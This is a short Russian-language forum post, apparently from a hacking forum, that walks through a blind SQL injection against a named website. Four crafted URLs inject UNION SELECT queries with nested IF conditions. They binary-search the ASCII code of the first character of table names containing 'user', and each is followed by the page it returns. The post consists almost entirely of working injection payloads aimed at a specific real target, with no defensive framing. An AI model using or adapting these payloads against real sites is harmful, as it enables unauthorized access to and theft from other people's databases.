|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Пример получения первого символа запроса "select group_concat(table_name) from information_schema.tables where table_name like '%user%'"
Код:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>128,if(@x>196,0,1),if(@x>64,5,6)),1,1,1,1,1--+
Возвращает страницу 5. Код символа в диапазоне (64;128]
Код:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>96,if(@x>112,0,1),if(@x>80,5,6)),1,1,1,1,1--+
Возвращает страницу 5. Код символа в диапазоне (80;96]
Код:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>88,if(@x>92,0,1),if(@x>84,5,6)),1,1,1,1,1--+
Возвращает страницу 5. Код символа в диапазоне (84;88]
Код:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>86,if(@x>87,0,1),if(@x>85,5,6)),1,1,1,1,1--+
Возвращает страницу 6. Код символа равен 85
|